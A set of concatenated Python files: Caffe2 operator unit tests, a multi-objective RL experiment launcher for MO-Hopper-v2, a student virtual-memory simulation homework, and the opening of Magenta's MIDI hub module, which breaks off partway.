self.ws.blobs['output_{}'.format(i + 1)].fetch()[0],
expected[i])
@given(initial_iters=st.integers(0, 100),
num_iters=st.integers(0, 100))
def test_iter_count_with_execution_step(self, initial_iters, num_iters):
net = core.Net("net")
net.Iter(["iter"], ["iter"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
step = core.ExecutionStep("step", [net])
step.SetIter(num_iters)
plan = core.Plan("plan")
plan.AddStep(step)
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], initial_iters + num_iters)
@given(initial_iters=st.integers(0, 100),
num_iters=st.integers(0, 100),
num_nets=st.integers(0, 5))
def test_atomic_iter_with_concurrent_steps(self, initial_iters, num_iters,
num_nets):
init_net = core.Net("init_net")
iter_mutex = init_net.CreateMutex([], ["iter_mutex"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
concurrent_steps = core.ExecutionStep("concurrent_steps",
num_iter=num_iters)
for i in range(num_nets):
net = core.Net("net_{}".format(i))
net.AtomicIter([iter_mutex, "iter"], ["iter"])
step = core.ExecutionStep("step", [net])
concurrent_steps.AddSubstep(step)
concurrent_steps.SetConcurrentSubsteps(True)
plan = core.Plan("plan")
plan.AddStep(concurrent_steps)
stats_net = core.Net("stats_net")
stats_net.StatRegistryExport([], ["stats_key", "stats_val", "stats_ts"])
self.ws.run(init_net)
self.ws.run(plan)
self.ws.run(stats_net)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], initial_iters + num_iters * num_nets)
if num_iters * num_nets > 0:
stats_key = self.ws.blobs[("stats_key")].fetch()
atomic_iter_key = b'atomic_iter/stats/iter/num_iter'
self.assertTrue(atomic_iter_key in stats_key)
stat_val = self.ws.blobs[("stats_val")].fetch()
self.assertEqual(num_iters * num_nets, stat_val[list(stats_key).index(atomic_iter_key)])
@given(a=hu.tensor(),
src=st.sampled_from(list(viewkeys(_NUMPY_TYPE_TO_ENUM))),
dst=st.sampled_from(list(viewkeys(_NUMPY_TYPE_TO_ENUM))),
use_name=st.booleans(),
**hu.gcs)
def test_cast(self, a, src, dst, use_name, gc, dc):
a = a.astype(src)
# Casting from a float type outside the range of the integral
# type is UB.
ftypes = [np.float32, np.float64]
if src in ftypes and dst not in ftypes and dst is not np.bool:
info = np.iinfo(dst)
a = np.clip(a, info.min, info.max)
def ref(data):
return [data.astype(dst)]
to = _NUMPY_TYPE_TO_ENUM[dst]
if use_name:
to = caffe2_pb2.TensorProto.DataType.Name(to).lower()
op = core.CreateOperator('Cast', ["X"], ["Y"], to=to)
self.assertDeviceChecks(dc, op, [a], [0])
out, = self.assertReferenceChecks(gc, op, [a], ref)
self.assertEqual(dst, out.dtype)
@given(a=hu.tensor(),
eps=st.floats(min_value=1e-4, max_value=1e-2),
a_grad=hu.tensor(elements=st.floats(min_value=0.01, max_value=0.99)),
eps_grad=st.floats(min_value=1e-4, max_value=1e-3),
**hu.gcs)
def test_logit(self, a, eps, a_grad, eps_grad, gc, dc):
def ref(data):
data = np.clip(data, eps, 1.0 - eps)
return (np.log(data / (1 - data)), )
# forward testing carried out in the full range of input
# to ensure original test coverage.
# gradient test carried out with reduced input range
# because the sharp increase of the logit curve at 0 and 1
# error increases dramtically when input is close to 0 or 1
# and it will fail the test.
# So we only run gradient test in the range of (0.01, 0.99)
# very occationally, test may fail due to random accumulated error
# reduce test range to (0.02, 0.98) will improve test stability
op = core.CreateOperator('Logit', ["X"], ["Y"], eps=eps)
self.assertDeviceChecks(dc, op, [a], [0])
self.assertReferenceChecks(gc, op, [a], ref)
op_grad = core.CreateOperator('Logit', ["X"], ["Y"], eps=eps_grad)
self.assertGradientChecks(gc, op_grad, [a_grad], 0, [0],
threshold=0.04, stepsize=2e-3)
@given(a=hu.tensor(elements=st.floats(allow_nan=True)),
value=st.floats(min_value=-10, max_value=10),
**hu.gcs)
def test_replace_nan(self, a, value, gc, dc):
def ref(data):
out = np.copy(data)
out[np.isnan(data)] = value
return (out, )
op = core.CreateOperator('ReplaceNaN', ["X"], ["Y"], value=value)
self.assertDeviceChecks(dc, op, [a], [0])
self.assertReferenceChecks(gc, op, [a], ref)
@given(data=_dtypes(dtypes=[np.int32, np.int64, np.float32, np.bool]).
flatmap(lambda dtype: hu.tensor(
min_dim=1, dtype=dtype, elements=hu.elements_of_type(dtype))),
has_input=st.booleans(),
has_extra_shape=st.booleans(),
extra_shape=st.lists(
min_size=1, max_size=5, elements=st.integers(1, 5)),
**hu.gcs)
def test_constant_fill(self, data, has_input, has_extra_shape, extra_shape,
gc, dc):
dtype = data.dtype.type
# in opt mode, np.bool is converted into np.bool_
if data.dtype == np.dtype(np.bool):
dtype = np.bool
value = data.item(0)
gt_shape = data.shape
inputs = [data]
enum_type = _NUMPY_TYPE_TO_ENUM[dtype]
if has_input:
if has_extra_shape:
op = core.CreateOperator('ConstantFill', ["X"], ["Y"],
dtype=enum_type,
extra_shape=extra_shape,
value=value)
gt_shape += tuple(extra_shape)
else:
op = core.CreateOperator('ConstantFill', ["X"], ["Y"],
dtype=enum_type,
value=value)
else:
op = core.CreateOperator('ConstantFill', [], ["Y"],
dtype=enum_type,
value=value,
shape=list(gt_shape))
inputs = []
def ref(inputs=None):
outputs = np.full(shape=gt_shape, fill_value=value, dtype=dtype)
return [outputs]
self.assertDeviceChecks(dc, op, inputs, [0])
out, = self.assertReferenceChecks(gc, op, inputs, ref)
self.assertEqual(dtype, out.dtype)
@given(t=st.integers(1, 5),
n=st.integers(1, 5),
d=st.integers(1, 5))
def test_elman_recurrent_network(self, t, n, d):
from caffe2.python import model_helper, brew
np.random.seed(1701)
step_net = model_helper.ModelHelper(name="Elman")
# TODO: name scope external inputs and outputs
step_net.Proto().external_input.extend(
["input_t", "seq_lengths", "timestep",
"hidden_t_prev", "gates_t_w", "gates_t_b"])
step_net.Proto().type = "simple"
step_net.Proto().external_output.extend(["hidden_t", "gates_t"])
brew.fc(step_net,
"hidden_t_prev", "gates_t", dim_in=d, dim_out=d, axis=2)
step_net.net.Sum(["gates_t", "input_t"], ["gates_t"])
step_net.net.Sigmoid(["gates_t"], ["hidden_t"])
# Initialize params for step net in the parent net
for op in step_net.param_init_net.Proto().op:
workspace.RunOperatorOnce(op)
backward_ops, backward_mapping = core.GradientRegistry.GetBackwardPass(
step_net.Proto().op, {"hidden_t": "hidden_t_grad"})
backward_mapping = {
str(k): str(v) for k, v in viewitems(backward_mapping)
}
backward_step_net = core.Net("ElmanBackward")
del backward_step_net.Proto().op[:]
backward_step_net.Proto().op.extend(backward_ops)
assert backward_mapping["input_t"] == "gates_t_grad"
links = [
("hidden_t_prev", "hidden", 0),
("hidden_t", "hidden", 1),
("input_t", "input", 0),
]
link_internal, link_external, link_offset = zip(*links)
backward_links = [
("hidden_t_prev_grad", "hidden_grad", 0),
("hidden_t_grad", "hidden_grad", 1),
("gates_t_grad", "input_grad", 0),
]
backward_link_internal, backward_link_external, backward_link_offset = \
zip(*backward_links)
backward_step_net.Proto().external_input.extend(["hidden_t_grad"])
backward_step_net.Proto().external_input.extend(
step_net.Proto().external_input)
backward_step_net.Proto().external_input.extend(
step_net.Proto().external_output)
inputs = ["input", "seq_lengths", "gates_t_w", "gates_t_b", "hidden_input"]
recurrent_inputs = ["hidden_input"]
op = core.CreateOperator(
"RecurrentNetwork",
inputs,
["output", "hidden", "hidden_output", "step_workspaces"],
alias_src=["hidden", "hidden"],
alias_dst=["output", "hidden_output"],
alias_offset=[1, -1],
recurrent_states=["hidden"],
initial_recurrent_state_ids=[
inputs.index(i) for i in recurrent_inputs
],
link_internal=link_internal,
link_external=link_external,
link_offset=link_offset,
backward_link_internal=backward_link_internal,
backward_link_external=backward_link_external,
backward_link_offset=backward_link_offset,
param=[inputs.index(p) for p in step_net.params],
step_net=step_net.Proto(),
backward_step_net=backward_step_net.Proto(),
outputs_with_grads=[0],
)
workspace.FeedBlob(
"input", np.random.randn(t, n, d).astype(np.float32))
workspace.FeedBlob(
"hidden_input", np.random.randn(1, n, d).astype(np.float32))
workspace.FeedBlob(
"seq_lengths", np.random.randint(0, t, size=(n,)).astype(np.int32))
def reference(input, seq_lengths, gates_w, gates_b, hidden_input):
T = input.shape[0]
N = input.shape[1]
D = input.shape[2]
hidden = np.zeros(shape=(T + 1, N, D))
assert hidden.shape[0] == T + 1
assert hidden.shape[1] == N
assert hidden.shape[2] == D
hidden[0, :, :] = hidden_input
for t in range(T):
input_t = input[t].reshape(1, N, D)
hidden_t_prev = hidden[t].reshape(1, N, D)
gates = np.dot(hidden_t_prev, gates_w.T)
gates = gates.reshape(1, N, D) + input_t.reshape(1, N, D)
hidden[t + 1] = sigmoid(gates)
return hidden[1:], hidden, hidden[-1].reshape(1, N, D)
self.assertReferenceChecks(
hu.cpu_do,
op,
[workspace.FetchBlob(name)
for name in ["input", "seq_lengths", "gates_t_w", "gates_t_b",
"hidden_input"]],
reference,
outputs_to_check=[0, 1, 2])
for param in [0, 2, 3]:
self.assertGradientChecks(
hu.cpu_do,
op,
[workspace.FetchBlob(name)
for name in ["input", "seq_lengths", "gates_t_w", "gates_t_b",
"hidden_input"]],
param,
[0])
@settings(suppress_health_check=[HealthCheck.filter_too_much])
@given(n=st.integers(1, 5),
c=st.integers(1, 5),
h=st.integers(1, 5),
w=st.integers(1, 5),
pad=st.integers(0, 2),
block_size=st.integers(2, 3),
**hu.gcs)
def test_space_to_batch(self, n, c, h, w, pad, block_size, gc, dc):
assume((h + 2 * pad) % block_size == 0)
assume((w + 2 * pad) % block_size == 0)
X = np.random.randn(n, c, h, w).astype(np.float32)
op = core.CreateOperator("SpaceToBatch", ["X"], ["Y"],
pad=pad, block_size=block_size)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@settings(suppress_health_check=[HealthCheck.filter_too_much])
@given(n=st.integers(1, 5),
c=st.integers(1, 5),
h=st.integers(1, 5),
w=st.integers(1, 5),
pad=st.integers(0, 2),
block_size=st.integers(2, 3),
**hu.gcs)
def test_batch_to_space(self, n, c, h, w, pad, block_size, gc, dc):
assume((h + 2 * pad) % block_size == 0)
assume((w + 2 * pad) % block_size == 0)
X = np.random.randn(
n * block_size * block_size,
c,
(h + 2 * pad) // block_size,
(w + 2 * pad) // block_size).astype(np.float32)
op = core.CreateOperator("BatchToSpace", ["X"], ["Y"],
pad=pad, block_size=block_size)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(),
in_place=st.booleans(),
scale=st.floats(min_value=-2.0, max_value=2.0),
**hu.gcs)
def test_scale(self, X, in_place, scale, gc, dc):
op = core.CreateOperator(
"Scale", ["X"], ["Y" if not in_place else "X"],
scale=scale)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(s=st.text())
def test_string_serde(self, s):
s = s.encode('ascii', 'ignore')
self.ws.create_blob("a").feed(s)
serialized = self.ws.blobs["a"].serialize("a")
self.ws.create_blob("b").deserialize(serialized)
self.assertEqual(s, self.ws.blobs[("a")].fetch())
self.assertEqual(s, self.ws.blobs[("b")].fetch())
@given(pad=st.integers(0, 3),
size=st.integers(1, 10),
input_channels=st.integers(1, 5),
batch_size=st.integers(1, 5),
order=st.sampled_from(["NCHW", "NHWC"]),
mode=st.sampled_from(["constant", "reflect", "edge"]),
**hu.gcs)
def test_same_pad_image(self, pad, size, input_channels, batch_size, order,
mode, gc, dc):
assume(size > pad)
op = core.CreateOperator(
"PadImage",
["X"],
["Y"],
pad=pad,
mode=mode,
order=order,
)
if order == "NHWC":
X = np.random.rand(
batch_size, size, size, input_channels).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (pad, pad), (pad, pad), (0, 0)), mode),)
else:
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode),)
self.assertReferenceChecks(gc, op, [X], numpy_pad_ref)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(pad_t=st.integers(0, 3),
pad_l=st.integers(0, 3),
pad_b=st.integers(0, 3),
pad_r=st.integers(0, 3),
size=st.integers(1, 10),
input_channels=st.integers(1, 5),
batch_size=st.integers(1, 5),
order=st.sampled_from(["NCHW", "NHWC"]),
mode=st.sampled_from(["constant", "reflect", "edge"]),
**hu.gcs)
def test_pad_image(self, pad_t, pad_l, pad_b, pad_r, size, input_channels,
batch_size, order, mode, gc, dc):
assume(size > max(pad_b, pad_r, pad_t, pad_l))
op = core.CreateOperator(
"PadImage",
["X"],
["Y"],
pad_t=pad_t,
pad_l=pad_l,
pad_b=pad_b,
pad_r=pad_r,
mode=mode,
order=order,
)
if order == "NHWC":
X = np.random.rand(
batch_size, size, size, input_channels).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (pad_t, pad_b), (pad_l, pad_r), (0, 0)),
mode),)
else:
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (0, 0), (pad_t, pad_b), (pad_l, pad_r)),
mode),)
self.assertReferenceChecks(gc, op, [X], numpy_pad_ref)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(size=st.integers(7, 10),
input_channels=st.integers(1, 10),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW", "NHWC"]),
epsilon=st.floats(min_value=1e-4, max_value=1e-2),
**hu.gcs_cpu_only)
def test_instance_norm(self, size, input_channels, batch_size, order,
epsilon, gc, dc):
op = core.CreateOperator(
"InstanceNorm",
["X", "scale", "bias"],
["Y"],
order=order,
epsilon=epsilon,
)
np.random.seed(1701)
scale = np.random.rand(input_channels).astype(np.float32) + 0.5
bias = np.random.rand(input_channels).astype(np.float32) - 0.5
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
if order == "NHWC":
X = X.swapaxes(1, 2).swapaxes(2, 3)
def ref_nchw(x, scale, bias):
x = x.reshape(batch_size * input_channels, size * size)
y = (x - x.mean(1)[:, np.newaxis])
y /= np.sqrt(x.var(1) + epsilon)[:, np.newaxis]
y = y.reshape(batch_size, input_channels, size, size)
y = y * scale.reshape(1, input_channels, 1, 1)
y = y + bias.reshape(1, input_channels, 1, 1)
return (y, )
def ref_nhwc(x, scale, bias):
x = x.swapaxes(2, 3).swapaxes(1, 2)
y = ref_nchw(x, scale, bias)[0]
return (y.swapaxes(1, 2).swapaxes(2, 3), )
self.assertReferenceChecks(
gc, op, [X, scale, bias],
ref_nchw if order == "NCHW" else ref_nhwc)
# TODO(jiayq): when there are backward and GPU implementations, enable
# these two.
# self.assertDeviceChecks(dc, op, [X, scale, bias], [0])
# self.assertGradientChecks(gc, op, [X, scale, bias], 0, [0])
ws = workspace.C.Workspace()
feeds = [("X", X), ("scale", scale), ("bias", bias)]
for blob, arr in feeds:
ws.create_blob(blob).feed(arr)
for _ in range(100):
ws.run(op)
for blob, arr in feeds:
np.testing.assert_array_equal(ws.blobs[blob].fetch(), arr)
@given(inp=_dtypes().flatmap(lambda dt: _tensor_and_indices(
elements=st.floats(min_value=0, max_value=1), dtype=dt)),
**hu.gcs)
def test_sparse_to_dense(self, inp, gc, dc):
first_dim, X, I = inp
if X.dtype != np.dtype('float32') and gc.device_type in {caffe2_pb2.CUDA, caffe2_pb2.HIP} :
# Cuda only support 32 bit float
print("Bailout {}".format(X.dtype))
return
if gc.device_type in {caffe2_pb2.CUDA, caffe2_pb2.HIP}:
# Cuda version only support int32
I = I.astype(np.int32)
# values don't matter
D = np.zeros((first_dim,) + X.shape[1:]).astype(X.dtype)
op = core.CreateOperator("SparseToDense", ["I", "X", "D"], ["Y"])
def sparse_to_dense(I, X, D):
O = np.zeros(D.shape)
for i, p in enumerate(I):
O[p] += X[i]
return [O]
self.assertReferenceChecks(gc, op, [I, X, D], sparse_to_dense)
X = X.astype(np.float32)
self.assertGradientChecks(gc, op, [I, X, D], 1, [0])
@given(inputs=hu.tensors(n=2, min_dim=2, max_dim=2), **hu.gcs_cpu_only)
def test_dot_product(self, inputs, gc, dc):
X, Y = inputs
op = core.CreateOperator("DotProduct", ["X", "Y"], 'out')
def dotproduct(X, Y):
return (np.sum(X * Y, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10),
K=st.integers(min_value=2, max_value=10),
pad_value=st.floats(min_value=0.1, max_value=1.0),
**hu.gcs_cpu_only)
def test_dot_product_with_padding(self, N, M, K, pad_value, gc, dc):
X = np.random.rand(N, M).astype(np.float32) - 0.5
Y = np.random.rand(N, K).astype(np.float32) - 0.5
op = core.CreateOperator("DotProductWithPadding", ["X", "Y"], 'out',
pad_value=pad_value)
def dotproduct(X, Y):
Z = np.ones((N, max(M, K))).astype(np.float32) * pad_value
if M < K:
Z[:, :M] = X
return (np.sum(Z * Y, axis=1), )
else:
Z[:, :K] = Y
return (np.sum(Z * X, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10),
pad_value=st.floats(min_value=0.1, max_value=1.0),
**hu.gcs_cpu_only)
def test_dot_product_with_rep_padding(self, N, M, pad_value, gc, dc):
K = 2 * M
X = np.random.rand(N, M).astype(np.float32) - 0.5
Y = np.random.rand(N, K).astype(np.float32) - 0.5
op = core.CreateOperator("DotProductWithPadding", ["X", "Y"], 'out',
replicate=True,
pad_value=pad_value)
def dotproduct(X, Y):
import numpy.matlib as npm
if M < K:
Z = npm.repmat(X, 1, K // M)
return (np.sum(Z * Y, axis=1), )
else:
Z = npm.repmat(Y, 1, M // K)
return (np.sum(Z * X, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10), **hu.gcs_cpu_only)
def test_ensure_dense(self, N, M, gc, dc):
# in place
X = np.random.rand(N, M).astype(np.float32) - 0.5
op = core.CreateOperator("EnsureDense", ["X"], "X")
self.assertReferenceChecks(gc, op, [X], lambda x: [x])
self.assertDeviceChecks(dc, op, [X], [0])
# or not
X = np.random.rand(N, M).astype(np.float32) - 0.5
op = core.CreateOperator("EnsureDense", ["X"], "out")
self.assertReferenceChecks(gc, op, [X], lambda x: [x])
self.assertDeviceChecks(dc, op, [X], [0])
@given(N=st.integers(min_value=10, max_value=100),
M=st.integers(min_value=2, max_value=10),
num_buckets=st.integers(min_value=1, max_value=5),
**hu.gcs_cpu_only)
def test_accumulate_histogram_op(self, N, M, num_buckets, gc, dc):
X = np.random.rand(N, M).astype(np.float32)
lower_bound, upper_bound = 0.1, 0.9
op = core.CreateOperator("AccumulateHistogram", ["X"],
['cur_hist', 'acc_hist'],
lower_bound=lower_bound,
upper_bound=upper_bound,
num_buckets=num_buckets)
def histogram(X):
hist = np.zeros((num_buckets + 2, ), dtype=np.int32)
segment = (upper_bound - lower_bound) / num_buckets
Y = np.zeros((N, M), dtype=np.int32)
Y[X < lower_bound] = 0
Y[X >= upper_bound] = num_buckets + 1
Y[(X >= lower_bound) & (X < upper_bound)] = \
((X[(X >= lower_bound) & (X < upper_bound)] - lower_bound) /
segment + 1).astype(np.int32)
for i in range(Y.shape[0]):
for j in range(Y.shape[1]):
hist[Y[i][j]] += 1
cur_hist, acc_hist = hist, hist
return [cur_hist, acc_hist]
self.assertDeviceChecks(dc, op, [X], [0, 1])
self.assertReferenceChecks(gc, op, [X], histogram)
if __name__ == "__main__":
unittest.main()
|
hopper-v2.py
|
import os, sys, signal
import random
import numpy as np
from multiprocessing import Process, Queue, current_process, freeze_support
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--pgmorl', default=False, action='store_true')
parser.add_argument('--ra', default=False, action='store_true')
parser.add_argument('--pfa', default=False, action='store_true')
parser.add_argument('--moead', default=False, action='store_true')
parser.add_argument('--random', default=False, action='store_true')
parser.add_argument('--num-seeds', type=int, default=6)
parser.add_argument('--num-processes',
type=int,
default=1,
help='number of algorithms to be run in parallel (Note: each algorithm needs 4 * num-tasks processors by default, so the total number of processors is 4 * num-tasks * num-processes.)')
parser.add_argument('--save-dir', type=str, default='./results/Hopper-v2')
args = parser.parse_args()
random.seed(2000)
commands = []
save_dir = args.save_dir
test_pgmorl = args.pgmorl
test_ra = args.ra
test_random = args.random
test_pfa = args.pfa
test_moead = args.moead
for i in range(args.num_seeds):
seed = random.randint(0, 1000000)
if test_pgmorl:
cmd = 'python morl/run.py '\
'--env-name MO-Hopper-v2 '\
'--seed {} '\
'--num-env-steps 8000000 '\
'--warmup-iter 200 '\
'--update-iter 40 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method prediction-guided '\
'--num-weight-candidates 7 '\
'--num-tasks 6 '\
'--sparsity 1.0 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pgmorl/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_ra:
cmd = 'python morl/run.py '\
'--env-name MO-Hopper-v2 '\
'--seed {} '\
'--num-env-steps 8000000 '\
'--warmup-iter 200 '\
'--update-iter 40 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method ra '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/ra/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_random:
cmd = 'python morl/run.py '\
'--env-name MO-Hopper-v2 '\
'--seed {} '\
'--num-env-steps 8000000 '\
'--warmup-iter 200 '\
'--update-iter 40 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method random '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/random/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_pfa:
cmd = 'python morl/run.py '\
'--env-name MO-Hopper-v2 '\
'--seed {} '\
'--num-env-steps 8000000 '\
'--warmup-iter 200 '\
'--update-iter 40 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method pfa '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pfa/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_moead:
cmd = 'python morl/run.py '\
'--env-name MO-Hopper-v2 '\
'--seed {} '\
'--num-env-steps 8000000 '\
'--warmup-iter 200 '\
'--update-iter 40 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method moead '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/moead/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
def worker(input, output):
for cmd in iter(input.get, 'STOP'):
ret_code = os.system(cmd)
if ret_code != 0:
output.put('killed')
break
output.put('done')
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for cmd in commands:
task_queue.put(cmd)
# Submit stop signals
for i in range(args.num_processes):
task_queue.put('STOP')
# Start worker processes
for i in range(args.num_processes):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
for i in range(args.num_processes):
print(f'Process {i}', done_queue.get())
|
ece565hw03code.py
|
#!/usr/bin/python
# Daniel Noyes, ECE565F2015 HW#3
#
# HW#3 Simulate a virtual memory system with multiprogramming,
# e.g., Pthreads. Assume that your machine has 4-bit virtual
# addresses and 8-bit physical address with 2 Byte page size.
# You need to implement two processes/threads:
# 1) Virtual Address Generation – generates a sequence of 4-bit
# random number, as virtual addresses, and writes them into an
# integer buffer of size N.
# 2) Address Translation – reads the next virtual address from
# the buffer and translates it to a physical address, keeping
# track of page faults as occurring.
# Test your system on my file “ece565hw03.txt” that contains the
# page table for your starting point.
#
# Programming Language : Python
# Environment: Linux
# Instructions: run in bash "python ece565hw03code.py ece565hw03.txt"
import sys
import os
import argparse
import random
import time
from multiprocessing import Process, Queue
#input Parser
parser = argparse.ArgumentParser(description='HW 3 Virtual memory system')
parser.add_argument("-i", "--input", dest='INPUT', help="Input File")
parser.add_argument("-o", "--output", dest='OUTPUT', help="Output File")
parser.add_argument("-d", "--debug", dest='DEBUG', help="Enable Debugging Mode", action='store_true')
global args
args = parser.parse_args()
#setup output file
if args.OUTPUT:
sys.stdout = open(args.OUTPUT, "w")
#Pagetable Class
class pagetable:
#INIT
def __init__(self):
self.frame = []
self.valid = []
self.size = 8 #Page Table Size
def info(self):
print("Page table: " + str(self.size))
for i in range(0,self.size):
print(str(self.frame[i]) + ":" + str(self.valid[i]))
def append(self,frame,valid):
self.frame.append(frame)
self.valid.append(valid)
def p(page):
return self.frame[page]
def v(page):
return self.valid[page]
#parseprocess: Will parse text data and build process data and add to the cpu que
def parseprocess(textfile):
table = pagetable()
text = open(textfile)
for line in text:
if line != '\n':
parse = line.split()
table.append(parse[0],parse[1])
text.close()
if args.DEBUG:
print("Table inported")
table.info()
return table
#Virtual Address Generator:
def vadrsgen(que):
while True:
num = random.getrandbits(4)
print("VA:" + "%2d" % num + " | ", end="",flush=True)
que.put(num)
time.sleep(1)
#Address Translation:
def adrstran(table,que):
while True:
num = que.get()
#Calculate various specifications
page = num / 2
offset = num % 2
valid = table.valid[int(page)]
print("PAGE" + "%2d" % page + " | " + "OFFSET" + "%2d" % offset + " | " + "VALID " + str(valid), end="",flush=True)
if valid == 'v':
frame = int(table.frame[int(page)])
phyadrs = frame * 2 + offset
print(" | " + "FRAME" + "%2d" % frame + " | " + "PHYADRS " + "%2d" % phyadrs)
else:
print(" | " + "PAGE FAULT!")
#main routine
def main():
print('Starting virtual memory Simulation')
table = parseprocess(args.INPUT)
que = Queue() #Que to send data back and forth
#Virtual Address Generator Process
randp = Process(target=vadrsgen,args=(que,))
randp.start()
#Address Translation Process
adrsp = Process(target=adrstran,args=(table,que,))
adrsp.start()
#Waits till the simulation is ctrl-c
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
print("Exiting Simulation")
break
randp.terminate()
adrsp.terminate()
sys.exit(0)
#Main Run routine
if __name__ == "__main__":
main()
|
midi_hub.py
|
# Copyright 2018 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module for interfacing with the MIDI environment."""
# TODO(adarob): Use flattened imports.
import abc
import collections
import re
import threading
import time
from magenta.common import concurrency
from magenta.protobuf import music_pb2
import mido
from six.moves import queue as Queue
import tensorflow as tf
_DEFAULT_METRONOME_TICK_DURATION = 0.05
_DEFAULT_METRONOME_PROGRAM = 117 # Melodic Tom
_DEFAULT_METRONOME_MESSAGES = [
mido.Message(type='note_on', note=44, velocity=64),
mido.Message(type='note_on', note=35, velocity=64),
mido.Message(type='note_on', note=35, velocity=64),
mido.Message(type='note_on', note=35, velocity=64),
]
_DEFAULT_METRONOME_CHANNEL = 1
# 0-indexed.
_DRUM_CHANNEL = 9
try:
# The RtMidi backend is easier to install and has support for virtual ports.
import rtmidi # pylint: disable=unused-import,g-import-not-at-top
mido.set_backend('mido.backends.rtmidi')
except ImportError:
# Tries to use PortMidi backend by default.
tf.logging.warn('Could not import RtMidi. Virtual ports are disabled.')
class MidiHubError(Exception): # pylint:disable=g-bad-exception-name
"""Base class for exceptions in this module."""
pass
def get_available_input_ports():
"""Returns a list of available input MIDI ports."""
return mido.get_input_names()
def get_available_output_ports():
"""Returns a list of available output MIDI ports."""
return mido.get_output_names()
class MidiSignal(object):
"""A class for representing a MIDI-based event signal.
Provides a `__str__` method to return a regular expression pattern for
matching against the string representation of a mido.Message with wildcards
for unspecified values.
Supports matching for message types 'note_on', 'note_off', and
'control_change'. If a mido.Message is given as the `msg` argument, matches
against the exact message, ignoring the time attribute. If a `msg` is
not given, keyword arguments must be provided matching some non-empty subset
of those listed as a value for at least one key in `_VALID_ARGS`.
Examples:
# A signal that matches any 'note_on' message.
note_on_signal = MidiSignal(type='note_on')
# A signal that matches any 'note_on' or 'note_off' message with a pitch
# value of 4 and a velocity of 127.
note_signal = MidiSignal(note=4, velocity=127)
